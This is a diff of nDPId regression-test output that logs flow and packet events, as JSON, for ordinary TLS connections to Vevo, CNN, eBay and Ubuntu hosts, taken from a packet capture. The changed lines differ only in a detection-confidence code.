{"version":"TLSv1.2","client_requested_server_name":"vevo.com","server_names":"*.cache.vevo.com,*.cache.vevodev.com,*.cache.vevoprd.com,*.cache.vevostg.com,*.vevodev.com,*.vevoprd.com,*.vevostg.com,stg.vevo.ly,vevo.com,vevo.ly,vevo.pl,vevo.tv,vevoapi.com,vevocdn.com,vevolive.tv,vevosubmit.com,www.vevo.ly,www.vevo.pl,*.vevo.com,*.vevo.ly,*.vevo.pl,*.vevo.tv,*.vevoapi.com,*.vevocdn.com,*.vevolive.tv,*.vevosubmit.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"00447ab319e9d94ba2b4c1248e155917","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign Atlas R3 DV TLS CA 2020","subjectDN":"CN=*.cache.vevo.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"ED:55:58:0E:19:94:FE:95:93:86:88:FE:30:27:DF:43:EB:74:17:C2"}} +00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":345,"source":"sites.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482734324,"flow_last_seen":1646482734334,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482734334,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.192.92","src_port":56468,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"vevo.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
+00930{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":346,"source":"sites.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482734324,"flow_last_seen":1646482734350,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":1857,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1646482734350,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.192.92","src_port":56468,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"vevo.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"00447ab319e9d94ba2b4c1248e155917","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01479{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":348,"source":"sites.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1646482734324,"flow_last_seen":1646482734350,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":4125,"flow_avg_l4_payload_len":687,"midstream":0,"thread_ts_msec":1646482734350,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.192.92","src_port":56468,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Vevo","breed":"Fun","category":"Music"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"vevo.com","server_names":"*.cache.vevo.com,*.cache.vevodev.com,*.cache.vevoprd.com,*.cache.vevostg.com,*.vevodev.com,*.vevoprd.com,*.vevostg.com,stg.vevo.ly,vevo.com,vevo.ly,vevo.pl,vevo.tv,vevoapi.com,vevocdn.com,vevolive.tv,vevosubmit.com,www.vevo.ly,www.vevo.pl,*.vevo.com,*.vevo.ly,*.vevo.pl,*.vevo.tv,*.vevoapi.com,*.vevocdn.com,*.vevolive.tv,*.vevosubmit.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"00447ab319e9d94ba2b4c1248e155917","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign Atlas R3 DV TLS CA 2020","subjectDN":"CN=*.cache.vevo.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"ED:55:58:0E:19:94:FE:95:93:86:88:FE:30:27:DF:43:EB:74:17:C2"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":351,"source":"sites.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482753482,"flow_last_seen":1646482753482,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482753482,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.66.79","src_port":48140,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":351,"source":"sites.pcapng","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1646482753482,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482753482,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8SaBAAEAG1aPAqAGAFwFCT7wMAbtaGHg4AAAAAKAC+vA\/9AAAAgQFtAQCCAr10Gu5AAAAAAEDAwc="} 
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":352,"source":"sites.pcapng","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1646482753504,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482753504,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADkGJkQXAUJPwKgBgAG7vAwZG5KKWhh4OaAS\/ogYMwAAAgQFtAQCCApuzQml9dBruQEDAwc="} 01168{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":353,"source":"sites.pcapng","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1646482753507,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482753507,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5SaJAAEAG06TAqAGAFwFCT7wMAbtaGHg5GRuSi4AYAfZqJAAAAQEICvXQa9NuzQmlFgMBAgABAAH8AwOUyHhinsfe9G2IXNgY9L7xAzZ+DjB199btap4Cw89cViDuti6QLvXTxzS8GPAI\/LqrruRicKAVDOLPOdfZnGvHHQAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAQAA4AAAtjZG4uY25uLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACCyATmKdF69bnRwMVBRd98tu612XdMkfb0+p4HzFN6fBwAXAEEE+SEvSVfUiTeIP8IKKsjphsMZuVwTWztloapho\/r89Lhgv68xO7BDbwW8nmN\/dVf8z\/v3pQVdFakWyi7cuNIpiwArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCLAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 
-00877{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":353,"source":"sites.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482753482,"flow_last_seen":1646482753507,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482753507,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.66.79","src_port":48140,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.CNN","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.cnn.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00918{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":354,"source":"sites.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482753482,"flow_last_seen":1646482753526,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482753526,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.66.79","src_port":48140,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.CNN","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cdn.cnn.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
+00877{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":353,"source":"sites.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482753482,"flow_last_seen":1646482753507,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482753507,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.66.79","src_port":48140,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.CNN","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.cnn.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00918{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":354,"source":"sites.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482753482,"flow_last_seen":1646482753526,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482753526,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.66.79","src_port":48140,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.CNN","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cdn.cnn.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":355,"source":"sites.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482759960,"flow_last_seen":1646482759960,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482759960,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.49","src_port":40832,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":355,"source":"sites.pcapng","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1646482759960,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482759960,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8N8NAAEAGsY7AqAGAAhGNMZ+AAbsz0CpkAAAAAKAC+vAbqAAAAgQFtAQCCApTrIzgAAAAAAEDAwc="} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":356,"source":"sites.pcapng","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1646482759979,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482759979,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADgG8VECEY0xwKgBgAG7n4Axx0rTM9AqZaAS\/ogIXwAAAgQFtAQCCAq1xN1AU6yM4AEDAwc="} 
01169{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":357,"source":"sites.pcapng","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1646482759982,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482759982,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5N8VAAEAGr4\/AqAGAAhGNMZ+AAbsz0CplMcdK1IAYAfb4fgAAAQEIClOsjPe1xN1AFgMBAgABAAH8AwO90p\/YrOJd\/Z4tss7jqktThIJxJIB3e+qrLLFobtKKlyAX6YhgDO5LSOYTxZN2IGu+QsQ1WdlQy7VgjD2lE+VvBgAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAARAA8AAAx3d3cuZWJheS5jb20AFwAA\/wEAAQAACgAOAAwAHQAXABgAGQEAAQEACwACAQAAIwAAABAADgAMAmgyCGh0dHAvMS4xAAUABQEAAAAAACIACgAIBAMFAwYDAgMAMwBrAGkAHQAgf8Mv24G6SSqxNEfrqm7W\/bejLWA6OGSZmHTWefPpxiwAFwBBBD+GtRBdEP9fCUeld\/IGhJTQe0q9+sY1uU3D5mNCoqM6EROqE0XBEIsVt1XPe0XwL5d6JRvhBZsY2OXTwlPA9KoAKwAFBAMEAwMADQAYABYEAwUDBgMIBAgFCAYEAQUBBgECAwIBAC0AAgEBABwAAkABABUAigAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00885{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":357,"source":"sites.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482759960,"flow_last_seen":1646482759982,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482759982,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.49","src_port":40832,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.eBay","breed":"Safe","category":"Shopping"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.ebay.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00926{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":358,"source":"sites.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482759960,"flow_last_seen":1646482760002,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482760002,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.49","src_port":40832,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.eBay","breed":"Safe","category":"Shopping"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.ebay.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00885{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":357,"source":"sites.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482759960,"flow_last_seen":1646482759982,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482759982,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.49","src_port":40832,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.eBay","breed":"Safe","category":"Shopping"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.ebay.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00926{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":358,"source":"sites.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482759960,"flow_last_seen":1646482760002,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482760002,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.49","src_port":40832,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.eBay","breed":"Safe","category":"Shopping"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.ebay.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":359,"source":"sites.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482772264,"flow_last_seen":1646482772264,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482772264,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"185.125.190.21","src_port":42884,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"sites.pcapng","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1646482772264,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482772264,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8SfdAAEAGtwnAqAGAuX2+FaeEAbviQ3M+AAAAAKAC+vAD2AAAAgQFtAQCCAo3btlLAAAAAAEDAwc="} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"sites.pcapng","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1646482772292,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482772292,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADcGCgG5fb4VwKgBgAG7p4RVAzgX4kNzP6AS\/ogvJwAAAgQFtAQCCAoh0SIcN27ZSwEDAwc="} 01167{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":361,"source":"sites.pcapng","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1646482772294,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482772294,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5SflAAEAGtQrAqAGAuX2+FaeEAbviQ3M\/VQM4GIAYAfaY1QAAAQEICjdu2Woh0SIcFgMBAgABAAH8AwMB8bRCQdqcx9fui+mF7VjuHN5SBb79arjGU4qYGthMOSBbTABCg135wJeFEPl+a8Oxzav9AsC9J9+l+IIaNAxYkQAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAWABQAABFhc3NldHMudWJ1bnR1LmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACCezVQBlUDf2SIx8m1xehLWY9pQKyvfH068Wwzre\/JcNwAXAEEEo09VNt2RkHEqlhHBw1nk6JbOlFIOJqgyxElu\/vwC+3XCJEwr43v+9rwXwcTyZXa+qtiIur9f6O0kVe2u0AJzEQArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":361,"source":"sites.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482772264,"flow_last_seen":1646482772294,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482772294,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"185.125.190.21","src_port":42884,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.UbuntuONE","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"assets.ubuntu.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00942{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":362,"source":"sites.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482772264,"flow_last_seen":1646482772325,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482772325,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"185.125.190.21","src_port":42884,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.UbuntuONE","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.3","client_requested_server_name":"assets.ubuntu.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
+00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":361,"source":"sites.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482772264,"flow_last_seen":1646482772294,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482772294,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"185.125.190.21","src_port":42884,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.UbuntuONE","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"assets.ubuntu.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00942{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":362,"source":"sites.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482772264,"flow_last_seen":1646482772325,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482772325,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"185.125.190.21","src_port":42884,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.UbuntuONE","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.3","client_requested_server_name":"assets.ubuntu.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":363,"source":"sites.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482785304,"flow_last_seen":1646482785304,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482785304,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.169.91","src_port":51248,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":363,"source":"sites.pcapng","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1646482785304,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482785304,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8c2NAAEAG\/FHAqAGAX4OpW8gwAbszoGaBAAAAAKAC+vB9ogAAAgQFtAQCCArCJt4xAAAAAAEDAwc="} 